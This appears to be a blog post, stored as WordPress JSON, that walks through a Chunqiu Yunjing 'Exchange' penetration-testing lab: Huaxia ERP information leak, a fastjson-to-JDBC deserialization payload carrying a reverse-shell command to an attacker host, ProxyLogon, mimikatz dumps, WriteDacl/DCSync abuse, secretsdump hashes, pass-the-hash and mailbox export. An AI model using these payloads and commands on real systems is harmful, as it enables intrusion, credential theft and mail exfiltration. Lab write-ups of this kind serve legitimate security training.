{"id":840,"date":"2025-03-19T23:35:14","date_gmt":"2025-03-19T15:35:14","guid":{"rendered":"http:\/\/www.s1mh0.cn\/blog\/?p=840"},"modified":"2025-12-17T12:22:35","modified_gmt":"2025-12-17T04:22:35","slug":"cqyj_exchange","status":"publish","type":"post","link":"https:\/\/www.s1mh0.cn\/blog\/index.php\/2025\/03\/19\/cqyj_exchange\/","title":{"rendered":"\u6625\u79cb\u4e91\u5883-Exchange"},"content":{"rendered":"

Exchange<\/h2>\n
\u534e\u590fERP \u4fe1\u606f\u6cc4\u9732\n\u534e\u590fERP RCE\uff08fastjson1.2.55\u53cd\u5e8f\u5217\u5316\u6253JDBC\uff09\nExchange ProxyLogon RCE\nwriteDacl\u7279\u6743\u5229\u7528\npthexchange \u5bfc\u51fa Exchange \u90ae\u4ef6<\/code><\/pre>\n
flag1<\/h3>\n
fscan\u626b\u51fa\u4e2aweb\uff0c\u767b\u5f55\u9875\u9762\u5b98\u65b9\u7f51\u7ad9\u90a3\u91cc\u8df3\u8f6c\u7684\u662f\u534e\u590ferp\u5b98\u7f51\uff0c\u7ed3\u5408\u7f51\u7ad9\u6807\u9898\u662f\u534e\u590ferp 2.3\u7248\u672c\u7684\u6846\u67b6<\/p>\n
start infoscan\n39.99.138.162:8000 open\n39.99.138.162:80 open\n39.99.138.162:22 open\n[*] alive ports len is: 3\nstart vulscan\n[*] WebTitle http:\/\/39.99.138.162      code:200 len:19813  title:lumia\n[*] WebTitle http:\/\/39.99.138.162:8000 code:302 len:0      title:None \u8df3\u8f6curl: http:\/\/39.99.138.162:8000\/login.html\n[*] WebTitle http:\/\/39.99.138.162:8000\/login.html code:200 len:5662   title:Lumia ERP<\/code><\/pre>\n
\u534e\u590fERP<\/h4>\n
\"exchange_1\"<\/p>\n
\u53bbgithub\u5b98\u7f51<\/a>\u4e0b\u8f7d\u6e90\u7801\uff0c\u5728pom.xml<\/code>\u67e5\u770bMaven\u4f9d\u8d56\uff0c\u770b\u5230fastjson1.2.55\u4e0emysql-connector\uff0c\u53ef\u4ee5\u6253fastjson\u53d1\u5e8f\u5217\u5316mysql\u94fe<\/p>\n
\"exchange_2\"<\/p>\n
\u56e0\u4e3a\u6f0f\u6d1e\u70b9\u5728\/user\/list?search=<\/code>\uff0c\u9700\u8981\u767b\u5f55\u624d\u80fd\u4f7f\u7528\uff0c\u56e0\u6b64\u5148\u5229\u7528\u534e\u590fERP\u4fe1\u606f\u6cc4\u9732\uff08CNVD-2020-63964\uff09\u83b7\u53d6\u8d26\u5bc6<\/p>\n
http:\/\/39.98.108.154:8000\/user\/getAllList;.ico<\/code><\/pre>\n
\"exchange_3\"<\/p>\n
\u5bc6\u7801\u662f\u7ecf\u8fc7md5\u52a0\u5bc6\u7684\uff0c\u89e3\u51fa\u6765123456<\/code><\/p>\n
\u767b\u5f55\u540e\u51c6\u5907\u4e00\u4e2a\u6076\u610fmysql\u670d\u52a1<\/a>\uff0cconfig.json\u6539\u4e0b\u9762\u4e24\u5904\uff0cserver.py\u7684ysoserialPath\u5c31\u4e0d\u7528\u6539\u4e86\uff0c\u5e76\u4e14\u5c06ysoserial-all.jar\u653e\u5230\u540c\u76ee\u5f55\u4e0b<\/p>\n
"config":{\n        "ysoserialPath":"ysoserial-all.jar",\n        "javaBinPath":"java",\n        "fileOutputDir":".\/fileOutput\/",\n        "displayFileContentOnScreen":true,\n        "saveToFile":true\n    },\n\n"yso":{\n        "Jdk7u21":["Jdk7u21","calc"],\n        "CommonsCollections6":["CommonCollections6","bash -c {echo,YmFza...Q==}|{base64,-d}|{bash,-i}"]\n    }<\/code><\/pre>\n
vps\u5f00\u542f\u6076\u610f\u670d\u52a1\uff0c\u5c06\u4e0b\u5217payload\u8f6curl\u7f16\u7801\u4f20\u5230\u6f0f\u6d1e\u70b9<\/p>\n
{ "name": { "@type": "java.lang.AutoCloseable", "@type": "com.mysql.jdbc.JDBC4Connection", "hostToConnectTo": "ip", "portToConnectTo": 13306, "info": { "user": "yso_CommonsCollections6_bash -c {echo,YmFza...Q==}|{base64,-d}|{bash,-i}", "password": "pass", "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", "autoDeserialize": "true", "NUM_HOSTS": "1" } }<\/code><\/pre>\n
GET \/user\/list?search=%7B%20%22name%22%3A%20%7B%20%22%40type%22%3A%20%22java%2Elang%2EAutoCloseable%22%2C%20%22%40type%22%3A%20%22com%2Emysql%2Ejdbc%2EJDBC4Connection%22%2C%20%22hostToConnectTo%22%3A%20%228%2E138%2E89%2E236%22%2C%20%22portToConnectTo%22%3A%2013306%2C%20%22info%22%3A%20%7B%20%22user%22%3A%20%22yso%5FCommonsCollections6%5Fbash%20%2Dc%20%7Becho%2CYmFzaCA...Q%3D%3D%7D%7C%7Bbase64%2C%2Dd%7D%7C%7Bbash%2C%2Di%7D%22%2C%20%22password%22%3A%20%22pass%22%2C%20%22statementInterceptors%22%3A%20%22com%2Emysql%2Ejdbc%2Einterceptors%2EServerStatusDiffInterceptor%22%2C%20%22autoDeserialize%22%3A%20%22true%22%2C%20%22NUM%5FHOSTS%22%3A%20%221%22%20%7D%20%7D<\/code><\/pre>\n
bp\u6293\u5305\u5f39shell<\/p>\n
\"exchange_4\"<\/p>\n
vshell\u4e0a\u7ebf\u62ff\u7b2c\u4e00\u4e2aflag<\/p>\n
\"exchange_5\"<\/p>\n
flag{4082a1ee-92ad-4328-bd1b-f72b9690b545}<\/code><\/pre>\n
flag2<\/h3>\n
\u4f20gost\u548cfscan<\/p>\n
start infoscan\n(icmp) Target 172.22.3.12     is alive\n(icmp) Target 172.22.3.2      is alive\n(icmp) Target 172.22.3.9      is alive\n(icmp) Target 172.22.3.26     is alive\n[*] Icmp alive hosts len is: 4\n172.22.3.12:80 open\n172.22.3.12:22 open\n172.22.3.9:8172 open\n172.22.3.9:808 open\n172.22.3.12:8000 open\n172.22.3.26:445 open\n172.22.3.9:445 open\n172.22.3.2:445 open\n172.22.3.9:443 open\n172.22.3.26:139 open\n172.22.3.9:139 open\n172.22.3.2:139 open\n172.22.3.26:135 open\n172.22.3.9:135 open\n172.22.3.2:135 open\n172.22.3.9:81 open\n172.22.3.2:88 open\n172.22.3.9:80 open\n[*] alive ports len is: 18\nstart vulscan\n[*] WebTitle http:\/\/172.22.3.12        code:200 len:19813  title:lumia\n[*] NetInfo \n[*]172.22.3.2\n   [->]XIAORANG-WIN16\n   [->]172.22.3.2\n[*] NetInfo \n[*]172.22.3.9\n   [->]XIAORANG-EXC01\n   [->]172.22.3.9\n[*] NetBios 172.22.3.26     XIAORANG\\XIAORANG-PC          \n[*] OsInfo 172.22.3.2   (Windows Server 2016 Datacenter 14393)\n[*] NetBios 172.22.3.9      XIAORANG-EXC01.xiaorang.lab         Windows Server 2016 Datacenter 14393\n[*] NetInfo \n[*]172.22.3.26\n   [->]XIAORANG-PC\n   [->]172.22.3.26\n[*] NetBios 172.22.3.2      [+] DC:XIAORANG-WIN16.xiaorang.lab      Windows Server 2016 Datacenter 14393\n[*] WebTitle http:\/\/172.22.3.12:8000   code:302 len:0      title:None \u8df3\u8f6curl: http:\/\/172.22.3.12:8000\/login.html\n[*] WebTitle http:\/\/172.22.3.12:8000\/login.html code:200 len:5662   title:Lumia ERP\n[*] WebTitle http:\/\/172.22.3.9:81      code:403 len:1157   title:403 - \u7981\u6b62\u8bbf\u95ee: \u8bbf\u95ee\u88ab\u62d2\u7edd\u3002\n[*] WebTitle https:\/\/172.22.3.9:8172   code:404 len:0      title:None\n[*] WebTitle http:\/\/172.22.3.9         code:403 len:0      title:None\n[*] WebTitle https:\/\/172.22.3.9        code:302 len:0      title:None \u8df3\u8f6curl: https:\/\/172.22.3.9\/owa\/\n[*] WebTitle https:\/\/172.22.3.9\/owa\/auth\/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237  title:Outlook\n\u5df2\u5b8c\u6210 18\/18\n[*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 11.993421962s<\/code><\/pre>\n
Exchange ProxyLogon RCE<\/h4>\n
\u626b\u5230exchange\u670d\u52a1<\/p>\n
\"exchange_6\"<\/p>\n
\u6e90\u4ee3\u7801\u770b\u4e00\u4e0b\u7248\u672c\u53f7<\/p>\n
\"exchange_7\"<\/p>\n
\u5728\u8fd9Exchange Server \u5185\u90e8\u7248\u672c\u53f7\u548c\u53d1\u884c\u65e5\u671f<\/a>\u770b\u5230\u662fserver 2016\u7248\u672c\uff0c\u80fd\u6253ProxyLogon<\/a><\/p>\n
\"exchange_8\"<\/p>\n
\"exchange_9\"<\/p>\n
\u6253\u5b8c\u76f4\u63a5\u662fsystem\u6743\u9650\uff0c\u6dfb\u52a0\u7ba1\u7406\u5458\u8d26\u53f7\u767b\u5f55<\/p>\n
proxychains4 python2 proxylogon.py 172.22.3.9 administrator@xiaorang.lab<\/code><\/pre>\n
\"exchange_10\"<\/p>\n
\u62ff\u7b2c\u4e8c\u4e2aflag<\/p>\n
\"exchange_11\"<\/p>\n
flag{b545e39f-c200-42aa-a0a5-7b0eea751757}<\/code><\/pre>\n
flag4<\/h3>\n
\u6709\u57df<\/p>\n
\"exchange_12\"<\/p>\n
\u9700\u8981\u4e00\u4e2a\u57df\u5185\u673a\u5668\u7528\u6237\u8d26\u5bc6\u6765\u7528bloodhound\u6536\u96c6\u4fe1\u606f\uff0c\u4e0a\u4f20mimikatz\uff0c\u7ba1\u7406\u5458\u6a21\u5f0f\u542f\u52a8cmd\u6293\u5bc6\u7801<\/p>\n
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"<\/code><\/pre>\n
* Username : XIAORANG-EXC01$\n     * Domain   : XIAORANG\n     * NTLM     : 434e9c959558729a6b6e5eba0cea514a\n     * SHA1     : b1a7824f98364b0b2dd20ee8be288a970066ad91\n    tspkg : \n    wdigest :   \n     * Username : XIAORANG-EXC01$\n     * Domain   : XIAORANG\n     * Password : (null)\n    kerberos :  \n     * Username : XIAORANG-EXC01$\n     * Domain   : xiaorang.lab\n\nUser Name         : Zhangtong\nDomain            : XIAORANG\nLogon Server      : XIAORANG-WIN16\nLogon Time        : 2025\/3\/5 21:15:54\nSID               : S-1-5-21-533686307-2117412543-4200729784-1147\n    msv :   \n     [00000003] Primary\n     * Username : Zhangtong\n     * Domain   : XIAORANG\n     * NTLM     : 22c7f81993e96ac83ac2f3f1903de8b4\n     * SHA1     : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e\n     * DPAPI    : ed14c3c4ef895b1d11b04fb4e56bb83b\n    kerberos :  \n     * Username : Zhangtong\n     * Domain   : XIAORANG.LAB\n     * Password : (null)<\/code><\/pre>\n
\u63a5\u7740\u5229\u7528\u57df\u5185\u673a\u5668\u7528\u6237XIAORANG-EXC01$<\/code>\u7684hash\u53bb\u6536\u96c6\u57df\u5185\u4fe1\u606f<\/p>\n
proxychains4 -q python3 bloodhound.py -u "XIAORANG-EXC01$" --hashes 434e9c959558729a6b6e5eba0cea514a:434e9c959558729a6b6e5eba0cea514a -d xiaorang.lab -dc XIAORANG-WIN16.xiaorang.lab -c all --dns-tcp -ns 172.22.3.2 --auth-method ntlm --zip<\/code><\/pre>\n
writeDacl\u7279\u6743\u5229\u7528<\/h4>\n
\"exchange_13\"<\/p>\n
\u7531\u4e0a\u53ef\u77e5\uff0c\u5728 exchange \u670d\u52a1\u5668\u4e2d\uff0c\u5176\u673a\u5668\u7528\u6237\u90fd\u5c5e\u4e8eExchange Windows Permissions<\/code>\u7ec4\uff0c\u4e14\u6539\u7ec4\u9ed8\u8ba4\u5bf9\u57df\u6709WriteDacl\u6743\u9650\uff0c\u6709\u6743\u9650\u4fee\u6539\u5bf9\u8c61ACL<\/p>\n
\u901a\u8fc7bloodhound\u6536\u96c6\u7684\u4fe1\u606f\u4e5f\u53ef\u4ee5\u9a8c\u8bc1\u8fd9\u4e00\u70b9<\/p>\n
\"exchange_13\"<\/p>\n
\"exchange_14\"<\/p>\n
\u5229\u7528dacledit.py\u7ed9Zhangtong\u7528\u6237\u6dfb\u52a0DCSync\u6743\u9650<\/p>\n
proxychains4 python3 dacledit.py xiaorang.lab\/XIAORANG-EXC01\\$ -hashes :434e9c959558729a6b6e5eba0cea514a -action write -rights DCSync -principal Zhangtong -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2<\/code><\/pre>\n
\"exchange_15\"<\/p>\n
SAM\u8f6c\u50a8<\/p>\n
proxychains4 python3 secretsdump.py xiaorang.lab\/Zhangtong@172.22.3.2 -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc-ntlm\n\nproxychains4 impacket-secretsdump xiaorang.lab\/Zhangtong@172.22.3.2  -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc-ntlm<\/code><\/pre>\n
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)\n[*] Using the DRSUAPI method to get NTDS.DIT secrets\nxiaorang.lab\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7acbc09a6c0efd81bfa7d5a1d4238beb:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nkrbtgt:502:aad3b435b51404eeaad3b435b51404ee:b8fa79a52e918cb0cbcd1c0ede492647:::\nDefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n...\nxiaorang.lab\\SM_68af2c4169b54d459:1133:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nxiaorang.lab\\HealthMailbox8446c5b:1135:aad3b435b51404eeaad3b435b51404ee:791f33afb2a747b0ba3c6d25848e9322:::\n...\nxiaorang.lab\\Lumia:1146:aad3b435b51404eeaad3b435b51404ee:862976f8b23c13529c2fb1428e710296:::\nZhangtong:1147:aad3b435b51404eeaad3b435b51404ee:22c7f81993e96ac83ac2f3f1903de8b4:::\nXIAORANG-WIN16$:1000:aad3b435b51404eeaad3b435b51404ee:64ca5f7b6605a8b03dd84fc8661791ee:::\nXIAORANG-EXC01$:1103:aad3b435b51404eeaad3b435b51404ee:434e9c959558729a6b6e5eba0cea514a:::\nXIAORANG-PC$:1104:aad3b435b51404eeaad3b435b51404ee:6e96c39095b000921699417255d7a9b7:::\n[*] Cleaning up...<\/code><\/pre>\n
\u62ff\u5230administrator\u54c8\u5e0c\u4e4b\u540e\u8fdb\u884cpth\u62ff\u5230flag04<\/p>\n
proxychains4 impacket-smbexec -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab\/administrator@172.22.3.2 -codec gbk\n\ntype C:\\Users\\Administrator\\flag\\flag.txt<\/code><\/pre>\n
\"exchange_16\"<\/p>\n
flag{96befb6f-9b0d-4ace-bdc0-d9f224faf2af}<\/code><\/pre>\n
flag3<\/h3>\n
pthexchange \u5bfc\u51fa Exchange \u90ae\u4ef6<\/h4>\n
\u7528\u5de5\u5177<\/a>\u4eceexchange\u670d\u52a1\u5668\u5bfc\u51fa\u90ae\u4ef6\uff0c\u7528\u6237\u540d\u53ca\u5bf9\u5e94\u5bc6\u7801hash\u503c\u5728\u524d\u9762SAM\u8f6c\u50a8\u65f6\u5df2\u62ff\u5230\uff0c\u5728\u5bfc\u51faLumia\u7528\u6237\u90ae\u4ef6\u65f6\u53d1\u73b0\u4e24\u5c01\u90ae\u4ef6<\/p>\n
proxychains4 python3 pthexchange.py --target https:\/\/172.22.3.9\/ --username Lumia --password '00000000000000000000000000000000:862976f8b23c13529c2fb1428e710296' --action Download<\/code><\/pre>\n
\"exchange_17\"<\/p>\n
\u4e00\u4e2a\u90ae\u4ef6\u9644\u4ef6\u662f\u52a0\u5bc6\u538b\u7f29\u5305\uff0c\u5e76\u63d0\u793a\u7528\u624b\u673a\u53f7\u52a0\u5bc6\uff1b\u53e6\u4e00\u4e2a\u90ae\u4ef6\u9644\u4ef6\u7ed9\u4e86excel\u8868\uff0c\u5176\u4e2d\u6709\u624b\u673a\u53f7\u4fe1\u606f\uff0c\u5c06\u624b\u673a\u53f7\u5bfc\u6210\u5bc6\u7801\u5b57\u5178<\/p>\n
\"exchange_18\"<\/p>\n
\u7528ARCHPR\u8fdb\u884c\u7206\u7834<\/p>\n
\"exchange_19\"<\/p>\n
\u6253\u5f00\u5f97\u5230\u6700\u540e\u4e00\u4e2aflag<\/p>\n
\"exchange_20\"<\/p>\n
flag{cf0c753c-233f-4729-8984-0746ea5878b7}<\/code><\/pre>\n
<\/div>","protected":false},"excerpt":{"rendered":"
Exchange \u534e\u590fERP \u4fe1\u606f\u6cc4\u9732 \u534e\u590fERP RCE\uff08fastjson1.2.55\u53cd\u5e8f\u5217\u5316\u6253JDBC\uff09  […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-840","post","type-post","status-publish","format-standard","hentry","category-pentesting"],"views":709,"_links":{"self":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/840","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=840"}],"version-history":[{"count":4,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/840\/revisions"}],"predecessor-version":[{"id":1154,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/840\/revisions\/1154"}],"wp:attachment":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=840"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=840"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=840"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}